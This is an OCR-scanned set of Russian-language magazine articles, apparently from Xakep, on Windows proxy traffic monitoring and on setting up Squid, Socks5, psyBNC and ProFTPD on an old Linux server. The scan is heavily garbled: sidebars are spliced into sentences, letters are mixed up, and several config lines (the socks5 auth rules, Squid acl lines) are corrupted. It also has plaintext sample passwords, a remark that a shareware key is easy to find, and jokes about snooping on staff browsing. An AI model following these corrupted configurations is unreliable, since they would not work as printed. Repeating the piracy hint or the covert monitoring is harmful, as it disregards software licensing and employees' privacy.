сколько он качает, и даже в какое 
время. Особенно хорошо показы- 
вать при разборе полетов, типа тут 
ты скачал столько-то, а тут ты запус- 
Tun e-mule и сосал из сети порнуш- 
ку, а тут ты по аське натрепался 
столько, что хватило бы на “Две 
сорванные башни". Тут же можно 
собрать пользователей в группы и 
смотреть статистику сразу на всю 
группу. Можно также посмотреть, 
кто качает по ночам, а кто днем. Кто 
лазал смотреть свое мыло, а кто от- 
сылал спам на несколько тонн. 

Все хорошо, но нет у проги WEB- 
интерфейса (может оно, конечно, и 
к лучшему :). Так что бразды прав- 
ления трафиком у админа. Если ты 
не админ, то будь уверен, на тебя 
можно повесить трафика на весь 
отдел, а можно и превратить тебя в 
белого и пушистого. Кроме этой 


проги есть еще Proxy Log Analyzer, 
прога shareware, но найти ключ не 
проблема. С этой прогой придется 
немного помучаться. Она берет на 
ура логи W3*, то есть Web Proxy 
Server, и начинает немного гнать, 
когда ей подсовываешь логи от 
winsock сервера. Ее не так просто 
настроить, но у нее есть вывод ре- 
зультатов работы в html файл, а 
следовательно, ты можешь запус- 
кать ее на автопилоте, с последую- 


дает именно техническая поддерж- 
ка, нежели продажа непосред- 
ственно программного продукта. 


ОЧУМЕЛЫЕ РУЧКИ 

Если тебе не терпится поковырять 
лог-файл, то вот тебе расшифровка 
по полям, бери в руки Perl и пиши 
декодер. Только не забудь вставить 
аутентификацию пользователей, им 
не нравится, когда все знают, куда 
они в сети ходят и что качают. 


щей выкладкой логов на сервак в 
твоей сетке. Прога поставляется 
как в архиве, так и в виде сетапа, 
который надо устанавливать. Поче- 
му сами мелкие ничего не предла- 
гают, для меня до сих пор загадка, 
поскольку большую часть денег 
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При разборе формата тебе стоит 
учесть, что не все поля обяза- 
тельны к заполнению, а поле с 
именем сервера и поле с передан- 
ными данными не обязательно 
идут подряд. Ориентироваться 
стоит по большей части на имя 
пользователя и время запроса. 
Запрос файла всегда идет перед 
передачей ответа. В случае ис- 
пользования winsock-npokcuka ни- 
какие данные не кэшируются, все 
остается как есть. Также неплохо 
загнать все логи в MySQL и про- 
изводить выборку уже средствами 
сервера. По умолчанию проксик 
умеет пихать все логи в базу, но 
только в MS SQL. Если горишь же- 
ланием поставить этого монстра 
ради обработки логов, то флаг в 
руки. Но это, по меньшей мере, за- 
бивание микроскопом гвоздей. Ес- 
ли же таковой сервак уже стоит, 
то можно на него довешать еще и 
логирование, сильно грузить его 
это не будет. Скрипты по обработ- 
ке запросов юзверей типа “a 
сколько мне уже накапало" напи- 
сать раз плюнуть. 


БОЧКА МЕДА 

Если ты уже решил для себя вотк- 
нуть в сетку МАТ, дабы избавиться 
от лишнего геморроя, то всем юз- 
верям (как, впрочем, и начальству) 
нужно еще рассказать, на кой, 
собственно, оно им надо. 

Во-первых, это простота установ- 
ки. Достаточно поставить клиента 
и все, нигде ничего прописывать 
больше не надо. Все проги под 
мастдаем, как правило, пользуют 
winsock, а следовательно, они даже 
не поймут, что их круто обвели. Во- 
вторых, не надо заморачиваться 
открытием входящего порта, напри- 
мер, в icq или в ftp клиентах. В обо- 
их случаях все за тебя сделает сер- 
вак, достаточно его один раз наст- 
роить и на всякий случай сделать 
бакап всех настроек. 

В-третьих, поскольку все завязано 
на домен, не надо прописывать от- 
дельно пользователей, пароль вво- 
дить нужно только при загрузке Вин- 
ды, далее все пойдет на автопилоте. 
Также не надо мучиться с написани- 
ем клиент-серверного сосфта, пос- 
кольку коннект с серваком в твоей 
сетке и за ее пределами будет прохо- 
дить по одному и тому же сценарию. 

Ну и жирный плюс: если ты админ, 
у тебя есть все вентили по управле- 
нию трафиком. Кроме того, все кон- 
некты пойдут через одну единствен- 
ную точку в сети. Ставь туда снифак 
или файрволл, оба они будут рабо- 
тать как надо. Но как всегда, в лю- 
бой дискете есть пара бэд-блоков. 


ЛОЖКА ДЕГТЯ 

Пора узнать, с какими трудностями 
тебе придется столкнуться. При пе- 
ремене чего-либо на серваке при- 
дется апдейтить все клиентские 
части. Так, например, тебе вздума- 
лось поменять внутреннюю адреса- 
цию сети. Ты зашел на сервак и ска- 
зал, что IP такие-то теперь наша ло- 
калка и нечего слать все это через 
весь и-нет. Но это не все, приго- 
товься к наплыву пользователей, 
которые будут кричать, что у них 


нет интернета. Для исправления 
этого мини-бага надо пройтись по 
машинам и нажать update в наст- 
ройках клиента MSP. Самое инте- 
ресное, что клиент может вообще 
отказаться апдейтиться, придется 
его сносить, перегружаться и ста- 
вить с нуля. Иногда, при невыяснен- 
ных пока обстоятельствах, клиент 
слетает сам по себе. Кроме того, 
никто не писал, да и не думает пи- 
сать клиента под ось Упх-платфор- 
мы; если у тебя есть продвинутые 
юзвери, пользующие эту ось, то 
инета им не видать как своих ушей. 
Также придется ставить отдельно 
файрволл, потому что средствами 
Винды много не отрежешь. Придет- 
ся ставить отдельный отлов банне- 
ров. Если хочешь перекрыть кисло- 
род на порно-сайты, то и тут придет- 
ся поставить дополнительный софт, 
потому как winsock не различает и 
не умеет глушить отдельный тра- 
фик. Кроме того, если какой-нибудь 
умник подсядет на жирный канал и 
будет тянуть фильмец, то вся сеть 
просто встанет без инета, пока этот 
ухарь не докачает. В общем, нет по- 
ка идеального решения от этих 
граблей. Все это обещалось испра- 
виться в ISA сервере, но он пока по 


Настройка лог-монитора 


производительности даже на инва- 
лида в коляске не похож. 


РЕШЕНИЕ ПРОБЛЕМ 

Есть решение, хоть и кривоватое, 
но оно работает. Для линуховых 
юзверей имеется обычный проксик, 
который втыкается одновременно с 
winsock-om. Он умеет кэшировать и 
обрезать урлы по имени. Плюс ты 
можешь не заморачиваться, если у 
тебя большинство юзеров пользу- 
ется IE; как только ты воткнешь 
MSP клиента, OH сам пропишет 
настройки проксятника в браузере. 
Для урезания баннеров очень хо- 
рошо подходит OutPost, установ- 
ленный на серваке (читай статью в 
этом же номере). Он отлавливает 
трафик и потрошит все пакеты. По 
скорости разница неощутима, зато 
по надежности ему пока нет рав- 
ных. Кроме того, кэш поможет тебе 
сэкономить не только трасрик, но и 
нервы. Так, если у тебя пользова- 
тели найдут все-таки лазейку и 
пойдут качать порнушку, ты, мирно 
просматривая кэш сервера, смо- 
жешь определить, откуда именно 
была скачана вся эта прелесть. 
После того как скинешь наиболее 
полюбившиеся картинки к себе на 
винт, можешь смело резать URL на 
серваке. 

Помимо стандартного проксика, 
ты можешь воткнуть еще и допол- 
нительные навески, например, 
проксомитрон. Причем ставь его 
перед проксиком, дабы он резал 
странички еще до того, как они скэ- 
шируются. Тогда пользователи, 
благодаря твоей доброй душе и от- 
цовской опеке, не увидят всех этих 
пошлых картинок и баннеров. 

А если это кому-то не понравится, 
можешь смело посылать его... ну, 
например, к шефу, пусть он ему go- 
кажет, что порно и баннеры необ- 
ходимы для рабочего процесса как 
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Если ты не ад- 
мин, то будь 
уверен, на тебя 
можно пове- 
сить трафика 
на весь отдел. 


Если у тебя 
есть домен, то 
ты можешь 
назначить ма- 
шины или 
пользовате- 
лей, которым 
можно пользо- 
ваться инетом. 
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ГОРЯЧИЙ ПРОКСИ-СЕРВЕР 


УСТАНОВКА СЕРВИСОВ НА СТАРЫЙ КОМПЬЮТЕР 


Докучаев Дмитрий aka Forb 
(forb@real.xakep.ru) 


Psybnc имеет 
довольно 
мощный язык 
скриптов, 
ознакомиться 
с ним можно в 
gjxtrfd мануал 
SCRIPTING, 
который 
находится в 
рабочем 
каталоге. 


После выпол- 
нения скрипта 
psybnc не за- 
вершает 
thread 
должным 
образом, 

ив итоге 
получается 
симпатичный 
zombie-npo- 
цесс. Причем 
при активной 
работе прокси- 
ка число таких 
процессов мо- 
жет достигать 
сотни штук. 


С каждым годом цифровые технологии сильно совершенствуются. Пользуются спросом 
лишь компьютеры последних поколений, вытесняя своих “предков”, которые были 


популярны с десяток лет назад. Но, несмотря на это, старый комп может сыграть 
большую роль в твоей работе. Мы не будем причислять себя к категории “мазохистов" 
и ставить на Hero Windows 95, чтобы насладиться тормозной работой (хотя иногда и 
продуктивной ;)). Как люди нового поколения, мы остановимся Ha Linux, потому как 
знаем, что правильная ось будет работать как на старых, так и на новых машинах. 


редставим ситуацию: 
ты работаешь адми- 
ном в небольшой ло- 
калке. Руководствуясь правилом 
“мухи отдельно, котлеты отдельно", 
хороший админ грамотно распреде- 
ляет задачи между серверами в се- 
ти. К примеру, он никогда не поста- 
вит на почтовую машину Quake- 
сервер и наоборот. Рано или no3g- 
но он захочет использовать ргоху 
для своей работы (или посадить на 
него своих клиентов). Для этой за- 
дачи вовсе необязательно ставить 
крутой Pentium4 с гигабайтными 
мозгами. Ргоху-сервер не требова- 
телен к ресурсам, поэтому он будет 
прекрасно жить и на 486 процессо- 
ре. Вот и отлично! Сегодня мы по- 
упражняемся в создании прокси- 
боекомплекта, состоящего из трех 
важных сервисов, которые очень 
любят использовать в работе. 


SQUID - ПРОСТО И УДОБНО 

Не будем мудрить с настройкой эк- 
зотических серверов, в которых 
полно багов, а остановимся на 
стандартном Squid, версии которо- 
го регулярно обновляются. Вооб- 
ще, про Squid можно написать OT- 
дельную книгу, потому как его воз- 
можности не знают границ (раз- 
личные методы авторизации, разг- 
раничение по скорости, подсчет 
трафика, настройка кеширования 
данных, администрирование через 
web ит.д. ит.п.). Поэтому я раск- 
рою лишь общие принципы наст- 
ройки этого демона. 


Первым делом скачиваем свежую 
версию Squid по ссылке http:// 
www.squid-cache.org/Versions/ 
v2/2.5/squid-2.5.STABLE3.tar.gz. Pac- 
паковываем и идем пить пиво, так 
как процесс распаковки на слабом 
проце может занять от одной до трех 
минут. Далее по порядку: ./configure, 
make, make install. Все должно прой- 
ти без осложнений и ошибок. Мо- 
жешь не заморачиваться опциями 
конфигуратора, если желаешь обыч- 
ной работы ргоху-зегуег"а (для вклю- 
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Последние версии Squid 


чения pool и т.п. необходимо уделить 
этому особое внимание). 


МУТИМ КОНФИГ 

После того как инсталляция Squid 
завершилась (естественно, успеш- 
HO ;)), перейдем к самой интересной 
и увлекательной процедуре - наст- 
ройке squid.conf (который по умол- 
чанию находится в /usr/local/squid/ 
etc/squid.conf). Конфу следует уде- 
лить особое внимание, чтобы га- 
рантировать правильную работу 
сервера, а также разграничить дос- 
туп к нему (иначе придут злобные 
хакеры и прокачают 10 гигабайт че- 
рез твой проксик ;)). Ниже ты уви- 
дишь, какие опции можно выки- 
нуть, а какие имеют огромное зна- 
чение. Итак, поехали! 


http_port 3128 
ЕН Порт, на котором будет висеть squid. По 
умолчанию 3128. 


icon_directory /usr/local/squid/share/icons 
error_directory 
/usr/local/squid/share/errors 

ЧЕН Пути к иконкам и сообщениям об 
ошибках демона. 


ас! QUERY urlpath_regex cgi-bin \? 
no_cache deny QUERY 

HH Запрещение кеширования файлов в 
каталоге /cgi-bin. 


cache_dir ufs /usr/local/squid/cache 100 16 256 


cache_access_log 
/usr/local/squid/logs/access.log 

cache_log /dev/null 

cache_store_log /dev/null 

## Директория для кеша, а также пути к 
логам. В моем случае логируются только 
входящие запросы к проксику. 


pid_filename /usr/local/squid/logs/squid.pid 
ЯН Путь к pid демона. 


ftp_user anonymous@mail.ru 
ЕН E-mail адрес, который будет при ано- 
нимном Ер-соединении. 


unlinkd_program 
/usr/local/squid/libexec/unlinkd 

+ Путь к внешней программе unlinkd - 
нужна для отключения ненужных Cache- 
файлов. 


# ACCESS CONTROLS 
ЯН Самое интересное - настройка доступа 
к демону по ip-agpecam. 


acl all src 0.0.0.0/0.0.0.0 
+ Добавим запись all, которая имеет 
сорц, равный произвольному ip-agpecy. 


acl password src 192.168.0.0/24 192.168.1.0/24 
HH A также две локальные подсетки (90- 
пустим, на этих адресах будут находиться 
клиенты и работники твоей локалки). 


acl CONNECT method CONNECT 
## Добавим поддержку метода CONNECT 
(куда современному проксику без него?). 


http_access allow password 
HH Разрешим юзать прокси-сервер клиен- 
там (смотри acl password). 


http_access deny CONNECT !password 
Я Использовать SSL CONNECT разрешаем 
только password-rpynne. 


http_access deny all 
Я Остальные пусть идут лесом ;). 


#4 С ACL разобрались. Мы еще вернемся к 
контролю при разборе полетов. Идем 
дальше. 


cache_mgr admin@localnet.ru 


cache_effective_user admin 
cache_effective_group root 


HH Задаем мыло владельца проксика, а 
также его права (Squid при запуске сдела- 
ет setuid() и будет работать с кешем с эти- 
ми правами). 


forwarded_for off 

## Мутим прозрачный прокси-сервер. Бла- 
годаря этой опции ip-agpec, с которого 
осуществлялся коннект на демон, отобра- 
жаться не будет. 


dns_testnames ns.localnet.ru 
as_whois_server whois.ripn.net 


## Напоследок задаем два параметра: ns- 
сервер локалки и whois-cepBep (нужны 
для корректной работы проксика). 


Вот, собственно, и весь конориг, ко- 
торый схиляет для нормальной рабо- 
ты Squid. Разумеется, если ты хочешь 
большего, этих опций мало - полный 
перечень параметров демона, а так- 
же описание к ним ты можешь найти, 
например, на www.opennet.ru. 

Следующим шагом для тебя будет 
создание кеш-директорий. Перед 
этим необходимо поставить вла- 
дельца и группу на каталог 
/usr/local/squid/cache. В нашем 
случае команда будет выглядеть 
следующим образом: 


# chown admin:root /usr/local/squid/cache 


Теперь переходим в /usr/local/ 
squid/sbin и запускаем бинарник 
squid с параметром -z. Демон поп- 


Грамотно составляем конфиг 


росит подождать и высветит над- 
пись, которая дает понять, что соз- 
дание директорий в процессе. На 
486dx эта операция выполняется 
около 10-15 минут, так что потерпи 
и ни в коем случае не прерывай ра- 
боту Squid. 


ДОВЕРЯЙ, НО ПРОВЕРЯЙ! 
Создали? Замечательно! Настало 
время проверить работу проксика. 
Первым делом запустим его (без 
параметров). Если конф настроен 
правильно, то ошибок при запуске 
не будет. Телнетимся на порт 3128 
и видим connection refused. Поторо- 
пились... Но как узнать, в чем дело 
и почему прокси не работает? От- 
вет прост - запустить squid с пара- 
метром -\ 2 (полный дебаг). После 
старта картина становится ясной - 
Squid не может подгрузить файлы 
с сообщениями об ошибках. На са- 
MOM деле, в каталоге /usr/local/ 
squid/share/errors содержится мно- 
го подкаталогов, которые имеют 
названия стран. Являясь патрио- 
том, выбираем Россию, кодировку 
ср-1251 (или koi8, на твой выбор). 
Копируем внутренности этого ката- 
лога в /usr/local/squid/share/ 
errors, например, командой 


# cp /usr/local/squid/share/errors/Russian- 
cp1251/* /usr/local/squid/share/errors/ 


После этого попробуем запустить 
Squid еще раз. Запуск, телнет, ви- 
дим, что порт успешно слушается. 
Отлично! Заодно проверим конт- 
роль. Пишем в сокет: 


Остается запихнуть Squid в авто- 
загрузку, чтобы не запускать про- 
цесс вручную после каждого ребута. 
Это ты должен уметь делать сам ;). 

Вот и все. Админ доволен, юзеры 
довольны, и сервер зря не пропадает. 
На досуге можешь почитать 
/usr/local/squid/logs/access.log и по- 
фильтровать асом ссылки на порно- 
сайты, которые почему-то так любят 
посещать сотрудники сети в рабочее 
время... Но это совсем другая история. 


НОСКИ - ПРОКСИ 
НОВОГО ПОКОЛЕНИЯ 
Прочитав название, ты, наверное, д0- 
гадался, что речь пойдет о настройке 
Socks. “Зачем устанавливать Squid и 
Socks на одном сервере?" - спросишь 
ты. “А почему бы и нет?" - отвечу я. 
Дело в том, что пользователи любят 
пользоваться аськой, которая очень 
хорошо взаимодействует с проксиком 
Socks5. В HTTPS-pemume случаются 
частые беспричинные дисконнекты. 
Первую часть установки особо 
комментировать не стоит. Сливаем 


Всем спасибо, все свободны =) 


Админ доволен, юзеры тоже, и сервер зря 
не пропадает. На досуге можешь почитать 
/usr/local/squid/logs/access.log и пофиль- 
тровать ас’ом ссылки на порносайты, 
которые почему-то так любят посещать 
сотрудники сети в рабочее время... 


HEAD http://www.ya.ru HTTP/1.1 


Если ты увидишь приветствующий 
хеадер НТТР 200 ОК, то радоваться 
не стоит. Да, конечно, есть смысл, 
ведь ты только что довел Squid go 
рабочего состояния... Но если ты 
был внимательным, то заметил, что 
локальному src не разрешается 
юзать проксик. Поэтому сервер бу- 
дет работать правильно только в 
том случае, если header будет начи- 
наться с запрещающих слов: НТТР 
403 ЕВКОК. Затем должна последо- 
вать проверка с src 192.168.0.0/24, 
и если все работает - нет повода 
для беспокойства. В противном слу- 
чае пересмотри squid.conf, возмож- 
но ты в чем-то ошибся. 


соксы по адресу: http://ahriman. 
bucharest.roedu.net/pub/linux/net/ 
proxy/socks5-v1.0rl0.tar.gz (Ha cTpa- 
нице производителя для скачива- 
ния носков необходима регистра- 
ция), а также небольшой патч к не- 
му (потом расскажу - зачем): http:// 
ahriman.bucharest.roedu.net/pub/ 
linux/net/proxy/socks5-v1.0r0.patchi.txt. 
После этого распаковываем архив, 
конофигурим. Затем немного пропат- 
чим сырцы соксов. Дело в том, что 
проксик плодит зомби-процессы 
при определенных условиях. Нам 
это не нужно :), поэтому переимену- 
ем расширение патча на .patch и 
выполним команду: 


# patch < socks5-v1.0r10.patch 
eS 
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Часто возни- 
кает задача 
перенаправить 
клиента 

с 80-го на 
3128 порт 
(принудитель- 
ный реди- 
рект). Это 
можно сделать 
при помощи 
iptables 
следующей 
записью: 


iptables -t nat 
-A PREROUT- 
ING -p tcp - 
dport 80 -j 
REDIRECT - 
to-port 3128 


Конфу cnegy- 
ет уделить 
особое внима- 
ние, чтобы 
гарантировать 
правильную 
работу серве- 
ра, а также 
разграничить 
доступ к нему 
(иначе придут 
злобные хаке- 
ры и прокача- 
ют 10 гигабайт 
через твой 
проксик ;)). 


Уломр UDO 
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Чтобы перечи- 
тать squid.conf, 
достаточно за- 
пустить squid 
с параметром 
-k reconfigure. 
Эта команда 
дает преиму- 
щество перед 
killall -1 squid, 
так как ты 
сразу узнаешь 
об ошибках, 
которые могут 
иметь место в 
конфе. 


При первом 
появлении на 
psybnc тебе 
необходимо 
добавить 
сервер. Дела- 
ется это 
командой 
/addserver 
host :port. 
Чтобы сменить 
сервак, выпол- 
ни /jump. Для 
полного пони- 
мания всех 
команд - набе- 
ри /bhelp ;). 


При верном раскладе мы пропат- 
чим файл socks5/lib/hostname.c и 
предотвратим порождение ненуж- 
HbIX зомби-процессов. 


АВТОРИЗУЕМСЯ 

Далее идут команды таке и таке 
install. После успешной установки 
необходимо создать конфиг-файл. 
По дефолту он будет находиться в 
/usr/local/etc/socks5.conf. В socks5 
существует несколько методов ав- 
торизации. Для разнообразия сде- 
лаем авторизу не по хостам, а по 
паролю. Для этого создадим кон- 
фиг со следующими параметрами: 


auth -- и 
permit и - - - --- 


Что будет означать авторизацию 
по паролю от всех хостов. В этой 
же папке должен находиться файл 
socks5.passwd, в котором записаны 
пароли пользователей (к сожале- 
нию, в plain-text). Этот конф может 
иметь вид: 


icq:icqpasswOrd 
root:letmeinsocks5 
user:userpass 


Все! Мы выполнили минимальную 
настройку зоск$5-демона. Остается 
лишь запустить его, вызвав 
/usr/local/bin/socks5. После этого 
будет слушаться порт 1080, к кото- 
рому можно законнектиться любым 
приложением :). Логи пишутся в 
стандартный /var/log/messages, но 
ты можешь перенастроить это, нем- 
ного помучив syslogd. 


Вообще, socks5 может многое: 
коннектиться к другому сокс-серве- 
ру, авторизовать по хостам и еще 
какими-то непонятными методами и 
т.д. Рекомендую почитать man 
socks5.conf для общего развития. 


Заштопаем старые носки ;) 


Проверить работу сокса не соста- 
вит особого труда. Запускаем тот же 
самый MIRC, заходим в опции, 
Connect->Firewall, вписываем хост 
машины, порт 1080, тип SOCKSS и ак- 
каунт (например, root:letmeinsocks). 
Затем соединяемся с IRC-cepBepom. 
Если пошел коннект - носки встали, 
как положено ;), если коннекта нет - 
уходим в /var/log/messages и разби- 
раемся, в чем дело. 
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РАДОСТИ В IRC - PSYBNC 

НА ТВОЕМ СЕРВЕРЕ 

Как гласит старинная поговорка, 
“Делу время - потехе час", поэтому 
я думаю, что IRC для тебя играет 
далеко не последнюю роль. Как ты, 
наверное, знаешь, для IRC сущест- 
вуют свои прокси. Более того, ты 
будешь всегда он-лайн, а чтобы 
присоединиться к беседе, необхо- 
димо лишь сконнектится с прокси- 
ком. Особую популярность завое- 
вал прокси (или баунсер, как его 
еще называют) PsyBnc, написанный 
командой tCl. Окунемся в увлека- 
тельный процесс его установки :). 


ДОСТАВКА, УСТАНОВКА... 
НЕДОРОГО 

Первым делом скачиваем баунсер с 
сайта разработчика: http://www. psy- 
choid.lam3rz.de/psyBNC2.3.1.tar.gz. 
Также рекомендуется скачать не- 
большой патч с моего сайта: http:// 
kamensk.net.ru/forb/1/psybnc.patch 
(позже я скажу, зачем OH нужен). 
Распакуем архив и немного удивим- 
ся отсутствию configure в пакете. С 
одной стороны, это хорошо - поль- 
зователю меньше заботы при уста- 
новке сосфта, но с другой - уход от 
стандарта может плохо закончиться. 
С этим я столкнулся, когда устанав- 
ливал Псю Ha Mandrake 9.0. Бинар- 
ник никак не хотел собираться в 
$фаНс-режиме, а чтобы найти ключи 
к make, исправить Makefile оказа- 
лось недостаточно. На самом деле, 
все вызовы компилятора были запи- 
саны в tools/autoconf.c и исполня- 
лись обычной функцией system(). В 
этих вызовах и были нужные ключи. 
На самом деле, это довольно глупое 
решение - наличие стандартного 
configure было бы намного удобнее 
для пользователя. 

Но вернемся к нашим баранам. Раз 
configure не оказалось, время соб- 
рать бинарник psybnc. Но перед этим 
вернусь к патчу, который я тебя про- 
сил скачать. Дело в том, что psybnc 
поддерживает такую фичу, как 
скриптинг. То есть ты можешь авто- 
матически идентифицировать свой 
ник, канал, выполнять различные ко- 
маноды и т.п. Но в каждой бочке меда 
есть своя ложка дегтя: разработчики 
поторопились и сделали досадную 
багу в баунсере. После выполнения 
скрипта psybnc не завершает thread 
должным образом, и в итоге получа- 
ется симпатичный Zombie-npouecc. 
Причем при активной работе прокси- 


ка число таких процессов может GOC- 


Процессы как на ладони! 
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Сажаем Мирк на соксы 


тигать сотни штук. Согласись, что 
расходовать ресурсы старенького 
компа на порождение зомбей глупо и 
бессмысленно. Для решения этой 
проблемы и был написан патч (greets 
to BetaTEST :)), который немного ви- 
доизменяет сишник Src/p_script.c. По- 
этому, если ты будешь использовать 
скриптинг в psybnc (а, скорее всего, 
так и будет), выполни команду patch < 
psybnc.patch. После этого можно сме- 
ло собирать баунсер командой таке. 


РИСУЕМ PSYBNC.CONF 
Далее необходимо создать нового 
пользователя в psybnc. Выполни make 
menuconfig, и перед тобой появится 
симпатичная графическая оболочка, 
где ты можешь за несколько минут 90- 
бавить нового пользователя с правами 
администратора. Но для жизни этой 
тулзы обязательно нужны псигез (ко- 
торые, ты, наверное, не ставил в целях 
экономии места). Если так случилось, 
что система заругалась матом на отсут- 
ствие керсесов, создадим конориг вруч- 
ную. При отсутствии пользователей в 
конфиге баунсер автоматически созда- 
ет администратора по иденту первого 
входящего в IRC. Пароль будет пере- 
дан командой /PASS, который автома- 
тически зашисрруется в psybnc.conf. 
Итак, создаем в рабочем каталоге 
файл psybnc.conf следующего со- 
держания. 


PSYBNC.SYSTEM.PORT1=31337 
PSYBNC.SYSTEM.LANGUAGE=russian 
PSYBNC.SYSTEM.HOSTI=* 


Этих трех строк вполне достаточно. 
Теперь можно запустить psybnc и по- 
пытаться его заюзать. Если при за- 
пуске высветится строка Listener сге- 
ated :0.0.0.0 port 31337, значит все 
нормально и баунсер готов к работе. 

Заделаемся админом баунсера. Для 
этого коннектимся к серверу IRC-Knu- 
ентом (переданный пароль запоми- 
нается автоматически). Если все 
прошло успешно, ты получишь пол- 
ный help oT psybnc (который ты, 
впрочем, можешь вызвать и сам ко- 
мандой /bhelp) и сообщение об авто- 
матическом статусе администратора. 


НЕМНОГО O СКРИПТАХ 
Раз я заговорил о скриптинге, то 
продолжу тему (не зря же мы пат- 


Массовый ликбез - читаем SCRIPTING 


чили баунсер ;)). Как было написано выше, скриптинг 
нужен для автоматического выполнения команд, а так- 
же для “реакции” на какое-либо событие. 

К примеру, нам нужно заидентисфицировать ник, как толь- 
ко сервисы попросят пароля (кстати, очень удобный скрипт 
- теперь тебя никогда не выкинет из ирки за плохую иден- 
тификацию). Для этого создаем файл USERI.SCRIPT в пап- 
ке scripts/ (разумеется, ты должен быть У$ЕК\Т, проверить 
это можно в рзубпс.соп®. В нем пишем следующий скрипт: 


Маска сервисов сети должна совпадать с написанной 
в скрипте. Как ты понял, при запросе пароля от серви- 
сов баунсер быстро его предоставит ;). 

Еще один пример. Возникла необходимость отослать 
СТСР-запрос на PING даже в случае, когда тебя нет в 
сети. Проще простого, дозаписываем в этот же файл 
строку: 


р PING *!*@ echo “NOTICE SNICK :ропд 


Ответ придет в качестве нотайса нику, который послал 
запрос. Вообще, рзубпс имеет довольно мощный язык 
скриптов, ознакомиться с ним можно, почекав мануал 
SCRIPTING, который находится в рабочем каталоге. Пе- 
резагрузить скрипт-файл можно командой /sreload. 


И ЭТО BCE?! 

Поздравляю! Только что ты создал свою прокси-маши- 
ну, включающую в себя целых три полезных демона, 
которые способны облегчить жизнь не только тебе, но 
и твоим клиентам и коллегам по работе. При написании 


материала преследовались две цели: в первую оче- 
редь, научить тебя устанавливать и настраивать прок- 
си-сервисы, а во-вторых, намекнуть, что для старого 
компа лучше правильной оси ничего не существует, 
ибо мелкософтовские операционки безбожно жрут ре- 
сурсы, a Linux He особо требователен к ним. 


Дружественная среда menuconfig 
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Ты, наверное, 
в курсе, что 
узнать пароль 
у служащего в 
компании нам- 
ного легче, 
чем сломать 
его самостоя- 
тельно. 


Докучаев Дмитрий aka Forb 
(forb@real.xakep.ru) 


о если человек толь- 
ко адаптируется к ра- 
бочей обстановке, пе- 
ред ним могут встать 

некоторые вопросы и проблемы. В 

этой статье я обрисую наиболее ти- 

пичные траблы, с которыми может 
столкнуться системщик, и расска- 
жу, как их решить под пингвином. 
Разумеется, что безопасность в 
твоей работе будет превыше всего. 

Поэтому на сервере должен нахо- 

диться лишь сост, проверенный 

временем. Админить работников, 
которые не разбираются в Linux, 
тоже не всегда приятно. Ты, навер- 

ное, в курсе, что узнать пароль у 

служащего в компании намного 

легче, чем сломать систему вруч- 
ную. Попробуем реализовать ситуа- 
цию следующим образом: устано- 

BUM на сервере сосфт, который под- 

держивает внешнюю аутентифика- 

цию (минуя системный /etc/shad- 
ow). После этого можно будет 3ano- 
чить пользователям пароли, обезо- 
пасив систему от хакеров. 


СТАВИМ FTPD 

В хорошем офисе никуда без Ftp- 
сервера. Оно понятно, пользовате- 
лям постоянно требуется файлохра- 
нилище, на котором находятся раз- 
ного рода документы и программы. 
В принципе, поднять сервис особо- 
го труда не представляет, но нужно 
четко знать устройство и работу де- 
мона перед тем как ставить его на 
сервер. Для нас необходимо 90- 
биться соблюдения двух условий: 
безопасности и поддержки внешней 
аутентификации. Я выбрал два де- 
мона, которые сочетают в себе эти 
фичи. Это ProFTPD и PureFTPD. 
Ввиду сложности установки и наст- 
ройки второго сервера, я ограни- 
чусь описанием работы ProFTPD, но 
в Риге ТРО намного больше воз- 
можностей: интеграция с mySQL, 
умная реализация прав и T.g. и т.п. 


'Анонимный вход на сервер ProFTPD 


Предлагаю установить его самосто- 
ятельно, предварительно скачав с 
сайта производителей по адресу: 
ftp://ftp.pureftpd.org/pub/pure- 
ftpd/releases/pure-ftpd-1.0.15.tgz. 

Мы же займемся установкой надеж- 
ного и безглючного ProFTPD. Снача- 
ла сгрузим сорцы этого сервера 
(ftp://ftp.proftpd.org/distrib/source/ 
proftpd-1.2.8.tar.gz). Далее все стан- 
дартно: распаковываем, конфигурим, 
инсталлируем. С этим проблем воз- 
никнуть не должно. После того как 
бинарники будут на своих местах, 
займемся редактированием консфига 
/etc/proftpd.conf. Вот как выглядит 
правильный файл, который как раз 
подходит для нашей ситуации. 


ServerName “ProFTPD on office.localnet.ru” 
HH Здесь необходимо указать баннер сер- 
виса, который будет отображаться пользо- 
вателю при коннекте. 

ServerType inetd 

ЗН Тип работы сервиса. Если будет stand- 
alone, то демон будет запускаться отдель- 
ным потоком, не вовлекая inetd в свои 
проблемы ;). Иначе будет режим inetd. 0 
TOM, как прописать сервер в конфиг inetd, 
я скажу немного позже. 

DefaultServer on 

Е Установка флага Default. Должно быть 
в положении оп, если на машине один ftpd 
DefaultRoot ~ !root 

## Установка chroot() для определенных 
групп. Chroot() это так называемая “скор- 
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АДМИНИМ ПРАВИЛЬНО: 


РУКОВОДСТВО ОФИСНОГО ПИНГВИНИСТРАТОРА 


лупа", когда сервер будет запущен относи- 
тельно какой-либо корневой директории. В 
этом режиме посмотреть каталоги ниже 
нее невозможно. 

В нашем примере chroot() выставляется 
всем пользователям, не имеющим root 
группу. Разумеется, что админам такой ре- 
жим не нужен, поэтому, если у пользова- 
теля нулевой gid, сервер запустится отно- 
сительно / каталога. 

Port 21 

ЕН Порт, на котором будет находиться сер- 
вис. По умолчанию - 21. 

Umask 022 

## Параметр, отвечающий за расстановку 
прав на новые каталоги и файлы. 
MaxInstances 30 

ЯН Бесполезный параметр для режима inetd 
:). Актуален лишь в Standalone и указывает 
на количество подпроцессов сервиса. 

User ftp 

Group guest 

ЕН Права, под которыми будет запущен 
сервер. Разумеется, перед запуском необ- 
ходимо создать юзера ftp и группу guest. 
TimeoutNoTransfer 600 

Timeoutldle 1200 

## Дефолтовая расстановка таймаутов. 
<Global> 

PassivePorts 2000 2500 

AuthUserFile /etc/passwd.ftpd 

RootLogin off 

AllowOverwrite yes 

AllowRetrieveRestart yes 

AllowStoreRestart yes 

DisplayLogin .message 

</Global> 


## Раздача прав на перезапись и go3a- 
пись в обе стороны. А также явное зада- 
ние портов для передачи данных и отдель- 
ного файла с паролями. Не забудем про 
запрет рутового входа (для нашей же бе- 
зопасности). 


<Directory /*> 
AllowOverwrite on 
</Directory> 
#+Разрешаем дозапись Ha все директории. 
<Anonymous ~ftp> 
User ftp 
Group ftp 
## Для анонимной поддержки устанавли- 
ваем соответствующие права. 
UserAlias anonymous ftp 
НИ делаем алиасинг логина anonymous. 
MaxClients 10 


HH Пускаем лишь 10 клиентов. 
DisplayLogin welcome.msg 
